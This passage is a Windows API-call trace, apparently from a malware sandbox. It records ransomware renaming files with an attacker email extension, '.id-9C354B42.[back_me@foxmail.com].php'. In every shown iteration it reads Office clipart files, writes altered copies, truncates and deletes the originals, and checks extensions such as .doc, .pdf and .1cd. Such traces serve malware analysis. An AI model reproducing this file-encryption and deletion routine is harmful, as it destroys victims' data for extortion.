Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.062] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0053.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.062] lstrlenW (lpString=".doc") returned 4 [0053.062] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.062] lstrlenW (lpString=".docx") returned 5 [0053.062] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.062] lstrlenW (lpString=".pdf") returned 4 [0053.062] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.062] lstrlenW (lpString=".xls") returned 4 [0053.062] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.062] lstrlenW (lpString=".xlsx") returned 5 [0053.062] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.062] lstrlenW (lpString=".ppt") returned 4 [0053.062] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.062] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.062] lstrlenW (lpString=".zip") returned 4 [0053.062] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.062] lstrlenW (lpString=".rar") returned 4 [0053.062] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.062] lstrlenW (lpString=".bz2") returned 4 [0053.062] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.062] lstrlenW (lpString=".7z") returned 3 [0053.062] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString=".dbf") returned 4 [0053.063] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString=".1cd") returned 4 [0053.063] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString=".jpg") returned 4 [0053.063] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString=".doc") returned 4 [0053.063] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.063] lstrlenW (lpString=".docx") returned 5 [0053.063] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.063] lstrlenW (lpString=".pdf") returned 4 [0053.063] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString=".xls") returned 4 [0053.063] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString=".xlsx") returned 5 [0053.063] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.063] lstrlenW (lpString=".ppt") returned 4 [0053.063] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.063] lstrlenW (lpString=".zip") returned 4 [0053.063] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString=".rar") returned 4 [0053.063] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.063] lstrlenW (lpString=".bz2") returned 4 [0053.064] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.064] lstrlenW (lpString=".7z") returned 3 [0053.064] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.064] lstrlenW (lpString=".dbf") returned 4 [0053.064] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.064] lstrlenW (lpString=".1cd") returned 4 [0053.064] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.064] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.064] lstrlenW (lpString=".jpg") returned 4 [0053.064] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.064] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0053.064] lstrlenW (lpString="AG00092_.GIF") returned 12 [0053.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.064] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=502) returned 1 [0053.064] CloseHandle (hObject=0x1b4) returned 1 [0053.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 0x20 [0053.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.065] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.065] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.065] GetLastError () returned 0x0 [0053.065] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1f6, lpOverlapped=0x0) returned 1 [0053.066] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x200, lpOverlapped=0x0) returned 1 [0053.067] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.067] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.067] SetEndOfFile (hFile=0x1a8) returned 1 [0053.068] CloseHandle (hObject=0x1a8) returned 1 [0053.068] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.068] SetEndOfFile (hFile=0x1b4) returned 1 [0053.068] CloseHandle (hObject=0x1b4) returned 1 [0053.069] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.069] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0053.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.071] lstrlenW (lpString=".doc") returned 4 [0053.071] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.071] lstrlenW (lpString=".docx") returned 5 [0053.071] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.072] lstrlenW (lpString=".pdf") returned 4 [0053.072] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString=".xls") returned 4 [0053.072] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString=".xlsx") returned 5 [0053.072] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.072] lstrlenW (lpString=".ppt") returned 4 [0053.072] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.072] lstrlenW (lpString=".zip") returned 4 [0053.072] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString=".rar") returned 4 [0053.072] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString=".bz2") returned 4 [0053.072] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.072] lstrlenW (lpString=".7z") returned 3 [0053.072] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.072] lstrlenW (lpString=".dbf") returned 4 [0053.072] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.072] lstrlenW (lpString=".1cd") returned 4 [0053.072] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.072] lstrlenW (lpString=".jpg") returned 4 [0053.072] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.073] lstrlenW (lpString=".doc") returned 4 [0053.073] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.073] lstrlenW (lpString=".docx") returned 5 [0053.073] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.073] lstrlenW (lpString=".pdf") returned 4 [0053.073] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.073] lstrlenW (lpString=".xls") returned 4 [0053.232] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.232] lstrlenW (lpString=".xlsx") returned 5 [0053.232] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.232] lstrlenW (lpString=".ppt") returned 4 [0053.232] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.232] lstrlenW (lpString=".zip") returned 4 [0053.232] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.232] lstrlenW (lpString=".rar") returned 4 [0053.232] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.232] lstrlenW (lpString=".bz2") returned 4 [0053.232] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.232] lstrlenW (lpString=".7z") returned 3 [0053.232] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.232] lstrlenW (lpString=".dbf") returned 4 [0053.232] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.232] lstrlenW (lpString=".1cd") returned 4 [0053.232] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.232] lstrlenW (lpString=".jpg") returned 4 [0053.232] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.350] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.350] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.350] GetLastError () returned 0x0 [0053.350] ReadFile (in: hFile=0x220, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x30c2, lpOverlapped=0x0) returned 1 [0053.361] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0053.362] ReadFile (in: hFile=0x220, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.362] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.362] SetEndOfFile (hFile=0x204) returned 1 [0053.362] CloseHandle (hObject=0x204) returned 1 [0053.362] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.362] SetEndOfFile (hFile=0x220) returned 1 [0053.363] CloseHandle (hObject=0x220) returned 1 [0053.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.363] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0053.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString=".doc") returned 4 [0053.364] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.364] lstrlenW (lpString=".docx") returned 5 [0053.364] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.364] lstrlenW (lpString=".pdf") returned 4 [0053.364] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.364] lstrlenW (lpString=".xls") returned 4 [0053.364] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.364] lstrlenW (lpString=".xlsx") returned 5 [0053.364] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.364] lstrlenW (lpString=".ppt") returned 4 [0053.364] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString=".zip") returned 4 [0053.364] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.364] lstrlenW (lpString=".rar") returned 4 [0053.364] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.364] lstrlenW (lpString=".bz2") returned 4 [0053.364] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.364] lstrlenW (lpString=".7z") returned 3 [0053.364] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString=".dbf") returned 4 [0053.364] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString=".1cd") returned 4 [0053.364] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.364] lstrlenW (lpString=".jpg") returned 4 [0053.364] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.365] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5030) returned 1 [0053.365] CloseHandle (hObject=0x220) returned 1 [0053.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 0x20 [0053.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.365] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.365] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0053.365] GetLastError () returned 0x0 [0053.365] ReadFile (in: hFile=0x220, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x13a6, lpOverlapped=0x0) returned 1 [0053.379] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x13b0, lpOverlapped=0x0) returned 1 [0053.380] ReadFile (in: hFile=0x220, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.380] WriteFile (in: hFile=0x204, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.380] SetEndOfFile (hFile=0x204) returned 1 [0053.380] CloseHandle (hObject=0x204) returned 1 [0053.381] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.381] SetEndOfFile (hFile=0x220) returned 1 [0053.381] CloseHandle (hObject=0x220) returned 1 [0053.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.382] lstrlenW (lpString=".doc") returned 4 [0053.382] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.382] lstrlenW (lpString=".docx") returned 5 [0053.382] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.382] lstrlenW (lpString=".pdf") returned 4 [0053.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".xls") returned 4 [0053.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".xlsx") returned 5 [0053.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.382] lstrlenW (lpString=".ppt") returned 4 [0053.382] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.382] lstrlenW (lpString=".zip") returned 4 [0053.382] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".rar") returned 4 [0053.382] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.382] lstrlenW (lpString=".bz2") returned 4 [0053.382] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.382] lstrlenW (lpString=".7z") returned 3 [0053.382] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.383] lstrlenW (lpString=".dbf") returned 4 [0053.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.383] lstrlenW (lpString=".1cd") returned 4 [0053.383] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.383] lstrlenW (lpString=".jpg") returned 4 [0053.383] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.388] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=6984) returned 1 [0053.388] CloseHandle (hObject=0x1bc) returned 1 [0053.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 0x20 [0053.388] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0053.389] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.389] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.389] GetLastError () returned 0x0 [0053.389] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1b48, lpOverlapped=0x0) returned 1 [0053.390] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1b50, lpOverlapped=0x0) returned 1 [0053.391] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, 